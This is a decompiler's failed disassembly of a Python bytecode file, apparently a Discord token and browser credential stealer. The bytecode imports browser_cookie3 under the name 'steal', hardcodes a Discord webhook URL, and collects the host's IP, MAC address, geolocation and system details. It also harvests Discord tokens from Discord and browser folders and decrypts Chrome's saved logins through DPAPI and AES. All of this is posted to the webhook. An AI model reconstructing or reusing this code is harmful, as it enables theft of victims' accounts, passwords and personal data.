
# file test/134197.pyc
# --- This code section failed: ---

 L.   3         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              psutil
                6  STORE_NAME               psutil

 L.   4         8  LOAD_CONST               0
               10  LOAD_CONST               None
               12  IMPORT_NAME              platform
               14  STORE_NAME               platform

 L.   5        16  LOAD_CONST               0
               18  LOAD_CONST               None
               20  IMPORT_NAME              json
               22  STORE_NAME               json

 L.   6        24  LOAD_CONST               0
               26  LOAD_CONST               ('datetime',)
               28  IMPORT_NAME              datetime
               30  IMPORT_FROM              datetime
               32  STORE_NAME               datetime
               34  POP_TOP          

 L.   7        36  LOAD_CONST               0
               38  LOAD_CONST               ('sleep',)
               40  IMPORT_NAME              time
               42  IMPORT_FROM              sleep
               44  STORE_NAME               sleep
               46  POP_TOP          

 L.   8        48  LOAD_CONST               0
               50  LOAD_CONST               None
               52  IMPORT_NAME              requests
               54  STORE_NAME               requests

 L.   9        56  LOAD_CONST               0
               58  LOAD_CONST               None
               60  IMPORT_NAME              socket
               62  STORE_NAME               socket

 L.  10        64  LOAD_CONST               0
               66  LOAD_CONST               ('get',)
               68  IMPORT_NAME              requests
               70  IMPORT_FROM              get
               72  STORE_NAME               get
               74  POP_TOP          

 L.  11        76  LOAD_CONST               0
               78  LOAD_CONST               None
               80  IMPORT_NAME              os
               82  STORE_NAME               os

 L.  12        84  LOAD_CONST               0
               86  LOAD_CONST               None
               88  IMPORT_NAME              re
               90  STORE_NAME               re

 L.  13        92  LOAD_CONST               0
               94  LOAD_CONST               None
               96  IMPORT_NAME              requests
               98  STORE_NAME               requests

 L.  14       100  LOAD_CONST               0
              102  LOAD_CONST               None
              104  IMPORT_NAME              subprocess
              106  STORE_NAME               subprocess

 L.  15       108  LOAD_CONST               0
              110  LOAD_CONST               ('getnode',)
              112  IMPORT_NAME              uuid
              114  IMPORT_FROM              getnode
              116  STORE_NAME               get_mac
              118  POP_TOP          

 L.  16       120  LOAD_CONST               0
              122  LOAD_CONST               None
              124  IMPORT_NAME              browser_cookie3
              126  STORE_NAME               steal
              128  LOAD_CONST               0
              130  LOAD_CONST               None
              132  IMPORT_NAME              requests
              134  STORE_NAME               requests
              136  LOAD_CONST               0
              138  LOAD_CONST               None
              140  IMPORT_NAME              base64
              142  STORE_NAME               base64
              144  LOAD_CONST               0
              146  LOAD_CONST               None
              148  IMPORT_NAME              random
              150  STORE_NAME               random
              152  LOAD_CONST               0
              154  LOAD_CONST               None
              156  IMPORT_NAME              string
              158  STORE_NAME               string
              160  LOAD_CONST               0
              162  LOAD_CONST               None
              164  IMPORT_NAME              zipfile
              166  STORE_NAME               zipfile
              168  LOAD_CONST               0
              170  LOAD_CONST               None
              172  IMPORT_NAME              shutil
              174  STORE_NAME               shutil
              176  LOAD_CONST               0
              178  LOAD_CONST               None
              180  IMPORT_NAME              dhooks
              182  STORE_NAME               dhooks
              184  LOAD_CONST               0
              186  LOAD_CONST               None
              188  IMPORT_NAME              os
              190  STORE_NAME               os
              192  LOAD_CONST               0
              194  LOAD_CONST               None
              196  IMPORT_NAME              re
              198  STORE_NAME               re
              200  LOAD_CONST               0
              202  LOAD_CONST               None
              204  IMPORT_NAME              sys
              206  STORE_NAME               sys
              208  LOAD_CONST               0
              210  LOAD_CONST               None
              212  IMPORT_NAME              sqlite3
              214  STORE_NAME               sqlite3

 L.  17       216  LOAD_CONST               0
              218  LOAD_CONST               ('Cipher', 'algorithms', 'modes')
              220  IMPORT_NAME_ATTR         cryptography.hazmat.primitives.ciphers
              222  IMPORT_FROM              Cipher
              224  STORE_NAME               Cipher
              226  IMPORT_FROM              algorithms
              228  STORE_NAME               algorithms
              230  IMPORT_FROM              modes
              232  STORE_NAME               modes
              234  POP_TOP          

 L.  18       236  LOAD_CONST               0
              238  LOAD_CONST               ('AESGCM',)
              240  IMPORT_NAME_ATTR         cryptography.hazmat.primitives.ciphers.aead
              242  IMPORT_FROM              AESGCM
              244  STORE_NAME               AESGCM
              246  POP_TOP          

 L.  19       248  LOAD_CONST               0
              250  LOAD_CONST               ('default_backend',)
              252  IMPORT_NAME_ATTR         cryptography.hazmat.backends
              254  IMPORT_FROM              default_backend
              256  STORE_NAME               default_backend
              258  POP_TOP          

 L.  20       260  LOAD_CONST               0
              262  LOAD_CONST               ('AES',)
              264  IMPORT_NAME_ATTR         Crypto.Cipher
              266  IMPORT_FROM              AES
              268  STORE_NAME               AES
              270  POP_TOP          

 L.  23       272  LOAD_CONST               0
              274  LOAD_CONST               ('b64decode', 'b64encode')
              276  IMPORT_NAME              base64
              278  IMPORT_FROM              b64decode
              280  STORE_NAME               b64decode
              282  IMPORT_FROM              b64encode
              284  STORE_NAME               b64encode
              286  POP_TOP          

 L.  24       288  LOAD_CONST               0
              290  LOAD_CONST               ('Webhook', 'Embed', 'File')
              292  IMPORT_NAME              dhooks
              294  IMPORT_FROM              Webhook
              296  STORE_NAME               Webhook
              298  IMPORT_FROM              Embed
              300  STORE_NAME               Embed
              302  IMPORT_FROM              File
              304  STORE_NAME               File
              306  POP_TOP          

 L.  25       308  LOAD_CONST               0
              310  LOAD_CONST               ('Popen', 'PIPE')
              312  IMPORT_NAME              subprocess
              314  IMPORT_FROM              Popen
              316  STORE_NAME               Popen
              318  IMPORT_FROM              PIPE
              320  STORE_NAME               PIPE
              322  POP_TOP          

 L.  26       324  LOAD_CONST               0
              326  LOAD_CONST               ('loads', 'dumps')
              328  IMPORT_NAME              json
              330  IMPORT_FROM              loads
              332  STORE_NAME               loads
              334  IMPORT_FROM              dumps
              336  STORE_NAME               dumps
              338  POP_TOP          

 L.  27       340  LOAD_CONST               0
              342  LOAD_CONST               ('copyfile',)
              344  IMPORT_NAME              shutil
              346  IMPORT_FROM              copyfile
              348  STORE_NAME               copyfile
              350  POP_TOP          

 L.  28       352  LOAD_CONST               0
              354  LOAD_CONST               ('argv',)
              356  IMPORT_NAME              sys
              358  IMPORT_FROM              argv
              360  STORE_NAME               argv
              362  POP_TOP          

 L.  31       364  LOAD_STR                 'https://discord.com/api/webhooks/847632584791949313/3OxCuQ90X6rc6ym3c0oK13yTdapgHJRAaE-vvou3ZXCn3Jq1ppsL6St-aj2poZ_iEmGL'
              366  STORE_NAME               url

 L.  37       368  LOAD_STR                 'B'
              370  BUILD_TUPLE_1         1 
              372  LOAD_CODE                <code_object scale>
              374  LOAD_STR                 'scale'
              376  MAKE_FUNCTION_1          'default'
              378  STORE_NAME               scale

 L.  44       380  LOAD_NAME                platform
              382  LOAD_METHOD              uname
              384  CALL_METHOD_0         0  ''
              386  STORE_NAME               uname

 L.  46       388  LOAD_NAME                datetime
              390  LOAD_METHOD              fromtimestamp
              392  LOAD_NAME                psutil
              394  LOAD_METHOD              boot_time
              396  CALL_METHOD_0         0  ''
              398  CALL_METHOD_1         1  ''
              400  STORE_NAME               bt

 L.  48       402  LOAD_NAME                socket
              404  LOAD_METHOD              gethostname
              406  CALL_METHOD_0         0  ''
              408  STORE_NAME               host

 L.  49       410  LOAD_NAME                socket
              412  LOAD_METHOD              gethostbyname
              414  LOAD_NAME                host
              416  CALL_METHOD_1         1  ''
              418  STORE_NAME               localip

 L.  51       420  LOAD_NAME                get
              422  LOAD_STR                 'https://api.ipify.org'
              424  CALL_FUNCTION_1       1  ''
              426  LOAD_ATTR                text
              428  STORE_NAME               publicip

 L.  52       430  LOAD_NAME                get
              432  LOAD_STR                 'https://ipapi.co/'
              434  LOAD_NAME                publicip
              436  FORMAT_VALUE          0  ''
              438  LOAD_STR                 '/city'
              440  BUILD_STRING_3        3 
              442  CALL_FUNCTION_1       1  ''
              444  LOAD_ATTR                text
              446  STORE_NAME               city

 L.  53       448  LOAD_NAME                get
              450  LOAD_STR                 'https://ipapi.co/'
              452  LOAD_NAME                publicip
              454  FORMAT_VALUE          0  ''
              456  LOAD_STR                 '/region'
              458  BUILD_STRING_3        3 
              460  CALL_FUNCTION_1       1  ''
              462  LOAD_ATTR                text
              464  STORE_NAME               region

 L.  54       466  LOAD_NAME                get
              468  LOAD_STR                 'https://ipapi.co/'
              470  LOAD_NAME                publicip
              472  FORMAT_VALUE          0  ''
              474  LOAD_STR                 '/postal'
              476  BUILD_STRING_3        3 
              478  CALL_FUNCTION_1       1  ''
              480  LOAD_ATTR                text
              482  STORE_NAME               postal

 L.  55       484  LOAD_NAME                get
              486  LOAD_STR                 'https://ipapi.co/'
              488  LOAD_NAME                publicip
              490  FORMAT_VALUE          0  ''
              492  LOAD_STR                 '/timezone'
              494  BUILD_STRING_3        3 
              496  CALL_FUNCTION_1       1  ''
              498  LOAD_ATTR                text
              500  STORE_NAME               timezone

 L.  56       502  LOAD_NAME                get
              504  LOAD_STR                 'https://ipapi.co/'
              506  LOAD_NAME                publicip
              508  FORMAT_VALUE          0  ''
              510  LOAD_STR                 '/currency'
              512  BUILD_STRING_3        3 
              514  CALL_FUNCTION_1       1  ''
              516  LOAD_ATTR                text
              518  STORE_NAME               currency

 L.  57       520  LOAD_NAME                get
              522  LOAD_STR                 'https://ipapi.co/'
              524  LOAD_NAME                publicip
              526  FORMAT_VALUE          0  ''
              528  LOAD_STR                 '/country_name'
              530  BUILD_STRING_3        3 
              532  CALL_FUNCTION_1       1  ''
              534  LOAD_ATTR                text
              536  STORE_NAME               country

 L.  58       538  LOAD_NAME                get
              540  LOAD_STR                 'https://ipapi.co/'
              542  LOAD_NAME                publicip
              544  FORMAT_VALUE          0  ''
              546  LOAD_STR                 '/country_calling_code'
              548  BUILD_STRING_3        3 
              550  CALL_FUNCTION_1       1  ''
              552  LOAD_ATTR                text
              554  STORE_NAME               callcode

 L.  59       556  LOAD_NAME                requests
              558  LOAD_METHOD              get
              560  LOAD_STR                 'http://ip-api.com/json?fields=proxy'
              562  CALL_METHOD_1         1  ''
              564  STORE_NAME               vpn

 L.  60       566  LOAD_NAME                vpn
              568  LOAD_METHOD              json
              570  CALL_METHOD_0         0  ''
              572  LOAD_STR                 'proxy'
              574  BINARY_SUBSCR    
              576  STORE_NAME               proxy

 L.  61       578  LOAD_NAME                get_mac
              580  CALL_FUNCTION_0       0  ''
              582  STORE_NAME               mac

 L.  64       584  LOAD_NAME                os
              586  LOAD_METHOD              getenv
              588  LOAD_STR                 'AppData'
              590  CALL_METHOD_1         1  ''
              592  STORE_NAME               roaming

 L.  66       594  LOAD_NAME                open
              596  LOAD_NAME                roaming
              598  LOAD_STR                 'temp.txt'
              600  BINARY_ADD       
              602  LOAD_STR                 'a'
              604  CALL_FUNCTION_2       2  ''
              606  STORE_NAME               output

 L.  71       608  LOAD_NAME                roaming
              610  LOAD_STR                 '\\Discord'
              612  BINARY_ADD       

 L.  72       614  LOAD_NAME                roaming
              616  LOAD_STR                 '\\discord'
              618  BINARY_ADD       

 L.  73       620  LOAD_NAME                roaming
              622  LOAD_STR                 '\\Discordcanary'
              624  BINARY_ADD       

 L.  74       626  LOAD_NAME                roaming
              628  LOAD_STR                 '\\discordcanary'
              630  BINARY_ADD       

 L.  75       632  LOAD_NAME                roaming
              634  LOAD_STR                 '\\discordptb'
              636  BINARY_ADD       

 L.  76       638  LOAD_NAME                roaming
              640  LOAD_STR                 '\\Google\\Chrome\\User Data\\Default'
              642  BINARY_ADD       

 L.  77       644  LOAD_NAME                roaming
              646  LOAD_STR                 '\\Opera Software\\Opera Stable'
              648  BINARY_ADD       

 L.  78       650  LOAD_NAME                roaming
              652  LOAD_STR                 '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
              654  BINARY_ADD       

 L.  79       656  LOAD_NAME                roaming
              658  LOAD_STR                 '\\Yandex\\YandexBrowser\\User Data\\Default'
              660  BINARY_ADD       

 L.  70       662  LOAD_CONST               ('Discord', 'Discord Two', 'Discord Canary', 'Discord Canary Two', 'Discord PTB', 'Google Chrome', 'Opera', 'Brave', 'Yandex')
              664  BUILD_CONST_KEY_MAP_9     9 
              666  STORE_NAME               Directories

 L.  84       668  LOAD_CODE                <code_object Yoink>
              670  LOAD_STR                 'Yoink'
              672  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              674  STORE_NAME               Yoink

 L. 102       676  LOAD_CODE                <code_object Wipe>
              678  LOAD_STR                 'Wipe'
              680  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              682  STORE_NAME               Wipe

 L. 112       684  LOAD_NAME                Directories
              686  LOAD_METHOD              items
              688  CALL_METHOD_0         0  ''
              690  GET_ITER         
              692  FOR_ITER            762  'to 762'
              694  UNPACK_SEQUENCE_2     2 
              696  STORE_NAME               Discord
              698  STORE_NAME               Directory

 L. 113       700  LOAD_NAME                os
              702  LOAD_ATTR                path
              704  LOAD_METHOD              exists
              706  LOAD_NAME                Directory
              708  CALL_METHOD_1         1  ''
          710_712  POP_JUMP_IF_FALSE   722  'to 722'

 L. 114       714  LOAD_NAME                Yoink
              716  LOAD_NAME                Directory
              718  CALL_FUNCTION_1       1  ''
              720  STORE_NAME               Tokens
            722_0  COME_FROM           710  '710'

 L. 115       722  LOAD_NAME                len
              724  LOAD_NAME                Tokens
              726  CALL_FUNCTION_1       1  ''
              728  LOAD_CONST               0
              730  COMPARE_OP               >
          732_734  POP_JUMP_IF_FALSE   758  'to 758'

 L. 116       736  LOAD_NAME                Tokens
              738  GET_ITER         
              740  FOR_ITER            758  'to 758'
              742  STORE_NAME               Token

 L. 117       744  LOAD_NAME                Token
              746  FORMAT_VALUE          0  ''
              748  LOAD_STR                 '\n'
              750  BUILD_STRING_2        2 
              752  STORE_NAME               realshit
          754_756  JUMP_BACK           740  'to 740'
            758_0  COME_FROM           732  '732'
          758_760  JUMP_BACK           692  'to 692'

 L. 120       762  LOAD_NAME                psutil
              764  LOAD_METHOD              cpu_freq
              766  CALL_METHOD_0         0  ''
              768  STORE_NAME               cpufreq

 L. 121       770  LOAD_NAME                psutil
              772  LOAD_METHOD              virtual_memory
              774  CALL_METHOD_0         0  ''
              776  STORE_NAME               svmem

 L. 122       778  LOAD_NAME                psutil
              780  LOAD_METHOD              disk_partitions
              782  CALL_METHOD_0         0  ''
              784  STORE_NAME               partitions

 L. 123       786  LOAD_NAME                psutil
              788  LOAD_METHOD              disk_io_counters
              790  CALL_METHOD_0         0  ''
              792  STORE_NAME               disk_io

 L. 124       794  LOAD_NAME                psutil
              796  LOAD_METHOD              net_io_counters
              798  CALL_METHOD_0         0  ''
              800  STORE_NAME               net_io

 L. 126       802  LOAD_NAME                psutil
              804  LOAD_METHOD              disk_partitions
              806  CALL_METHOD_0         0  ''
              808  STORE_NAME               partitions

 L. 127       810  LOAD_NAME                partitions
              812  GET_ITER         
              814  FOR_ITER            866  'to 866'
              816  STORE_NAME               partition

 L. 128       818  SETUP_FINALLY       836  'to 836'

 L. 129       820  LOAD_NAME                psutil
              822  LOAD_METHOD              disk_usage
              824  LOAD_NAME                partition
              826  LOAD_ATTR                mountpoint
              828  CALL_METHOD_1         1  ''
              830  STORE_NAME               partition_usage
              832  POP_BLOCK        
              834  JUMP_BACK           814  'to 814'
            836_0  COME_FROM_FINALLY   818  '818'

 L. 130       836  DUP_TOP          
              838  LOAD_NAME                PermissionError
          840_842  <121>               860  ''
              844  POP_TOP          
              846  POP_TOP          
              848  POP_TOP          

 L. 131       850  POP_EXCEPT       
          852_854  JUMP_BACK           814  'to 814'
              856  POP_EXCEPT       
              858  JUMP_BACK           814  'to 814'
              860  <48>             
          862_864  JUMP_BACK           814  'to 814'

 L. 137       866  LOAD_NAME                requests
              868  LOAD_ATTR                post
              870  LOAD_NAME                url
              872  LOAD_NAME                json
              874  LOAD_METHOD              dumps
              876  LOAD_STR                 'embeds'
              878  LOAD_STR                 'Someone Runs Program! - '
              880  LOAD_NAME                host
              882  FORMAT_VALUE          0  ''
              884  BUILD_STRING_2        2 
              886  LOAD_CONST               8781568
              888  LOAD_CONST               ('title', 'color')
              890  BUILD_CONST_KEY_MAP_2     2 
              892  LOAD_CONST               7506394
              894  LOAD_STR                 'GeoLocation'
              896  LOAD_STR                 'Using VPN?: '
              898  LOAD_NAME                proxy
              900  FORMAT_VALUE          0  ''
              902  LOAD_STR                 '\nLocal IP: '
              904  LOAD_NAME                localip
              906  FORMAT_VALUE          0  ''
              908  LOAD_STR                 '\nPublic IP: '
              910  LOAD_NAME                publicip
              912  FORMAT_VALUE          0  ''
              914  LOAD_STR                 '\nMAC Adress: '
              916  LOAD_NAME                mac
              918  FORMAT_VALUE          0  ''
              920  LOAD_STR                 '\n\nCountry: '
              922  LOAD_NAME                country
              924  FORMAT_VALUE          0  ''
              926  LOAD_STR                 ' | '
              928  LOAD_NAME                callcode
              930  FORMAT_VALUE          0  ''
              932  LOAD_STR                 ' | '
              934  LOAD_NAME                timezone
              936  FORMAT_VALUE          0  ''
              938  LOAD_STR                 '\nregion: '
              940  LOAD_NAME                region
              942  FORMAT_VALUE          0  ''
              944  LOAD_STR                 '\nCity: '
              946  LOAD_NAME                city
              948  FORMAT_VALUE          0  ''
              950  LOAD_STR                 ' | '
              952  LOAD_NAME                postal
              954  FORMAT_VALUE          0  ''
              956  LOAD_STR                 '\nCurrency: '
              958  LOAD_NAME                currency
              960  FORMAT_VALUE          0  ''
              962  LOAD_STR                 '\n\n\n\n'
              964  BUILD_STRING_23      23 
              966  LOAD_CONST               ('name', 'value')
              968  BUILD_CONST_KEY_MAP_2     2 
              970  BUILD_LIST_1          1 
              972  LOAD_CONST               ('color', 'fields')
              974  BUILD_CONST_KEY_MAP_2     2 
              976  LOAD_STR                 'fields'
              978  LOAD_STR                 'System Information'
              980  LOAD_STR                 'System: '
              982  LOAD_NAME                uname
              984  LOAD_ATTR                system
              986  FORMAT_VALUE          0  ''
              988  LOAD_STR                 '\nNode: '
              990  LOAD_NAME                uname
              992  LOAD_ATTR                node
              994  FORMAT_VALUE          0  ''
              996  LOAD_STR                 '\nMachine: '
              998  LOAD_NAME                uname
             1000  LOAD_ATTR                machine
             1002  FORMAT_VALUE          0  ''
             1004  LOAD_STR                 '\nProcessor: '
             1006  LOAD_NAME                uname
             1008  LOAD_ATTR                processor
             1010  FORMAT_VALUE          0  ''
             1012  LOAD_STR                 '\n\nBoot Time: '
             1014  LOAD_NAME                bt
             1016  LOAD_ATTR                year
             1018  FORMAT_VALUE          0  ''
             1020  LOAD_STR                 '/'
             1022  LOAD_NAME                bt
             1024  LOAD_ATTR                month
             1026  FORMAT_VALUE          0  ''
             1028  LOAD_STR                 '/'
             1030  LOAD_NAME                bt
             1032  LOAD_ATTR                day
             1034  FORMAT_VALUE          0  ''
             1036  LOAD_STR                 ' '
             1038  LOAD_NAME                bt
             1040  LOAD_ATTR                hour
             1042  FORMAT_VALUE          0  ''
             1044  LOAD_STR                 ':'
             1046  LOAD_NAME                bt
             1048  LOAD_ATTR                minute
             1050  FORMAT_VALUE          0  ''
             1052  LOAD_STR                 ':'
             1054  LOAD_NAME                bt
             1056  LOAD_ATTR                second
             1058  FORMAT_VALUE          0  ''
             1060  BUILD_STRING_20      20 
             1062  LOAD_CONST               ('name', 'value')
             1064  BUILD_CONST_KEY_MAP_2     2 
             1066  BUILD_LIST_1          1 
             1068  BUILD_MAP_1           1 
             1070  LOAD_CONST               15109662
             1072  LOAD_STR                 'CPU Information'
             1074  LOAD_STR                 'Psychical cores: '
             1076  LOAD_NAME                psutil
             1078  LOAD_ATTR                cpu_count
             1080  LOAD_CONST               False
             1082  LOAD_CONST               ('logical',)
             1084  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             1086  FORMAT_VALUE          0  ''
             1088  LOAD_STR                 '\nTotal Cores: '
             1090  LOAD_NAME                psutil
             1092  LOAD_ATTR                cpu_count
             1094  LOAD_CONST               True
             1096  LOAD_CONST               ('logical',)
             1098  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             1100  FORMAT_VALUE          0  ''
             1102  LOAD_STR                 '\n\nMax Frequency: '
             1104  LOAD_NAME                cpufreq
             1106  LOAD_ATTR                max
             1108  LOAD_STR                 '.2f'
             1110  FORMAT_VALUE_ATTR     4  ''
             1112  LOAD_STR                 'Mhz\nMin Frequency: '
             1114  LOAD_NAME                cpufreq
             1116  LOAD_ATTR                min
             1118  LOAD_STR                 '.2f'
             1120  FORMAT_VALUE_ATTR     4  ''
             1122  LOAD_STR                 'Mhz\n\nTotal CPU usage: '
             1124  LOAD_NAME                psutil
             1126  LOAD_METHOD              cpu_percent
             1128  CALL_METHOD_0         0  ''
             1130  FORMAT_VALUE          0  ''
             1132  LOAD_STR                 '\n'
             1134  BUILD_STRING_11      11 
             1136  LOAD_CONST               ('name', 'value')
             1138  BUILD_CONST_KEY_MAP_2     2 
             1140  LOAD_STR                 'Nemory Information'
             1142  LOAD_STR                 'Total: '
             1144  LOAD_NAME                scale
             1146  LOAD_NAME                svmem
             1148  LOAD_ATTR                total
             1150  CALL_FUNCTION_1       1  ''
             1152  FORMAT_VALUE          0  ''
             1154  LOAD_STR                 '\nAvailable: '
             1156  LOAD_NAME                scale
             1158  LOAD_NAME                svmem
             1160  LOAD_ATTR                available
             1162  CALL_FUNCTION_1       1  ''
             1164  FORMAT_VALUE          0  ''
             1166  LOAD_STR                 '\nUsed: '
             1168  LOAD_NAME                scale
             1170  LOAD_NAME                svmem
             1172  LOAD_ATTR                used
             1174  CALL_FUNCTION_1       1  ''
             1176  FORMAT_VALUE          0  ''
             1178  LOAD_STR                 '\nPercentage: '
             1180  LOAD_NAME                svmem
             1182  LOAD_ATTR                percent
             1184  FORMAT_VALUE          0  ''
             1186  LOAD_STR                 '%'
             1188  BUILD_STRING_9        9 
             1190  LOAD_CONST               ('name', 'value')
             1192  BUILD_CONST_KEY_MAP_2     2 
             1194  LOAD_STR                 'Disk Information'
             1196  LOAD_STR                 'Total Size: '
             1198  LOAD_NAME                scale
             1200  LOAD_NAME                partition_usage
             1202  LOAD_ATTR                total
             1204  CALL_FUNCTION_1       1  ''
             1206  FORMAT_VALUE          0  ''
             1208  LOAD_STR                 '\nUsed: '
             1210  LOAD_NAME                scale
             1212  LOAD_NAME                partition_usage
             1214  LOAD_ATTR                used
             1216  CALL_FUNCTION_1       1  ''
             1218  FORMAT_VALUE          0  ''
             1220  LOAD_STR                 '\nFree: '
             1222  LOAD_NAME                scale
             1224  LOAD_NAME                partition_usage
             1226  LOAD_ATTR                free
             1228  CALL_FUNCTION_1       1  ''
             1230  FORMAT_VALUE          0  ''
             1232  LOAD_STR                 '\nPercentage: '
             1234  LOAD_NAME                partition_usage
             1236  LOAD_ATTR                percent
             1238  FORMAT_VALUE          0  ''
             1240  LOAD_STR                 '%\n\nTotal read: '
             1242  LOAD_NAME                scale
             1244  LOAD_NAME                disk_io
             1246  LOAD_ATTR                read_bytes
             1248  CALL_FUNCTION_1       1  ''
             1250  FORMAT_VALUE          0  ''
             1252  LOAD_STR                 '\nTotal write: '
             1254  LOAD_NAME                scale
             1256  LOAD_NAME                disk_io
             1258  LOAD_ATTR                write_bytes
             1260  CALL_FUNCTION_1       1  ''
             1262  FORMAT_VALUE          0  ''
             1264  BUILD_STRING_12      12 
             1266  LOAD_CONST               ('name', 'value')
             1268  BUILD_CONST_KEY_MAP_2     2 
             1270  LOAD_STR                 'Network Information'
             1272  LOAD_STR                 'Total Sent: '
             1274  LOAD_NAME                scale
             1276  LOAD_NAME                net_io
             1278  LOAD_ATTR                bytes_sent
             1280  CALL_FUNCTION_1       1  ''
             1282  FORMAT_VALUE          0  ''
             1284  LOAD_STR                 '")\nTotal Received: '
             1286  LOAD_NAME                scale
             1288  LOAD_NAME                net_io
             1290  LOAD_ATTR                bytes_recv
             1292  CALL_FUNCTION_1       1  ''
             1294  FORMAT_VALUE          0  ''
             1296  BUILD_STRING_4        4 
             1298  LOAD_CONST               ('name', 'value')
             1300  BUILD_CONST_KEY_MAP_2     2 
             1302  BUILD_LIST_4          4 
             1304  LOAD_CONST               ('color', 'fields')
             1306  BUILD_CONST_KEY_MAP_2     2 
             1308  LOAD_CONST               7440378
             1310  LOAD_STR                 'Discord information'
             1312  LOAD_STR                 'Token: '
             1314  LOAD_NAME                realshit
             1316  FORMAT_VALUE          0  ''
             1318  BUILD_STRING_2        2 
             1320  LOAD_CONST               ('name', 'value')
             1322  BUILD_CONST_KEY_MAP_2     2 
             1324  BUILD_LIST_1          1 
             1326  LOAD_CONST               ('color', 'fields')
             1328  BUILD_CONST_KEY_MAP_2     2 
             1330  BUILD_LIST_5          5 
             1332  BUILD_MAP_1           1 
             1334  CALL_METHOD_1         1  ''
             1336  LOAD_STR                 'Content-Type'
             1338  LOAD_STR                 'application/json'
             1340  BUILD_MAP_1           1 
             1342  LOAD_CONST               ('data', 'headers')
             1344  CALL_FUNCTION_KW_3     3  '3 total positional and keyword args'
             1346  POP_TOP          

 L. 139      1348  LOAD_STR                 'Google\\Chrome\\User Data\\Default\\Login Data'
             1350  STORE_NAME               DBP

 L. 140      1352  LOAD_NAME                os
             1354  LOAD_ATTR                environ
             1356  LOAD_STR                 'LOCALAPPDATA'
             1358  BINARY_SUBSCR    
             1360  STORE_NAME               ADP

 L. 143      1362  LOAD_CODE                <code_object sniff>
             1364  LOAD_STR                 'sniff'
             1366  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1368  STORE_NAME               sniff

 L. 161      1370  LOAD_CODE                <code_object encrypt>
             1372  LOAD_STR                 'encrypt'
             1374  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1376  STORE_NAME               encrypt

 L. 168      1378  LOAD_CODE                <code_object decrypt>
             1380  LOAD_STR                 'decrypt'
             1382  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1384  STORE_NAME               decrypt

 L. 174      1386  LOAD_CODE                <code_object rcipher>
             1388  LOAD_STR                 'rcipher'
             1390  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1392  STORE_NAME               rcipher

 L. 179      1394  LOAD_CODE                <code_object dpapi>
             1396  LOAD_STR                 'dpapi'
             1398  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1400  STORE_NAME               dpapi

 L. 199      1402  LOAD_CODE                <code_object localdata>
             1404  LOAD_STR                 'localdata'
             1406  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1408  STORE_NAME               localdata

 L. 206      1410  LOAD_CODE                <code_object decryptions>
             1412  LOAD_STR                 'decryptions'
             1414  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1416  STORE_NAME               decryptions

 L. 216      1418  LOAD_BUILD_CLASS 
             1420  LOAD_CODE                <code_object chrome>
             1422  LOAD_STR                 'chrome'
             1424  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1426  LOAD_STR                 'chrome'
             1428  CALL_FUNCTION_2       2  ''
             1430  STORE_NAME               chrome

 L. 263      1432  LOAD_NAME                __name__
             1434  LOAD_STR                 '__main__'
             1436  COMPARE_OP               ==
         1438_1440  POP_JUMP_IF_FALSE  1482  'to 1482'

 L. 264      1442  LOAD_NAME                chrome
             1444  CALL_FUNCTION_0       0  ''
             1446  STORE_NAME               main

 L. 265      1448  SETUP_FINALLY      1462  'to 1462'

 L. 266      1450  LOAD_NAME                main
             1452  LOAD_METHOD              chromedb
             1454  CALL_METHOD_0         0  ''
             1456  POP_TOP          
             1458  POP_BLOCK        
             1460  JUMP_FORWARD       1474  'to 1474'
           1462_0  COME_FROM_FINALLY  1448  '1448'

 L. 267      1462  POP_TOP          
             1464  POP_TOP          
             1466  POP_TOP          

 L. 268      1468  POP_EXCEPT       
             1470  JUMP_FORWARD       1474  'to 1474'
             1472  <48>             
           1474_0  COME_FROM          1470  '1470'
           1474_1  COME_FROM          1460  '1460'

 L. 269      1474  LOAD_NAME                main
             1476  LOAD_METHOD              saved
             1478  CALL_METHOD_0         0  ''
             1480  POP_TOP          
           1482_0  COME_FROM          1438  '1438'

 L. 275      1482  LOAD_CODE                <code_object beamed>
             1484  LOAD_STR                 'beamed'
             1486  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1488  STORE_NAME               beamed

 L. 390      1490  LOAD_NAME                beamed
             1492  CALL_FUNCTION_0       0  ''
             1494  POP_TOP          

Parse error at or near `<121>' instruction at offset 840_842

Instruction context:
   
 L. 130       836  DUP_TOP          
                 838  LOAD_NAME                PermissionError
->           840_842  <121>               860  ''
                 844  POP_TOP          
                 846  POP_TOP          
                 848  POP_TOP          

test/134197.pyc -- 
# decompile failed
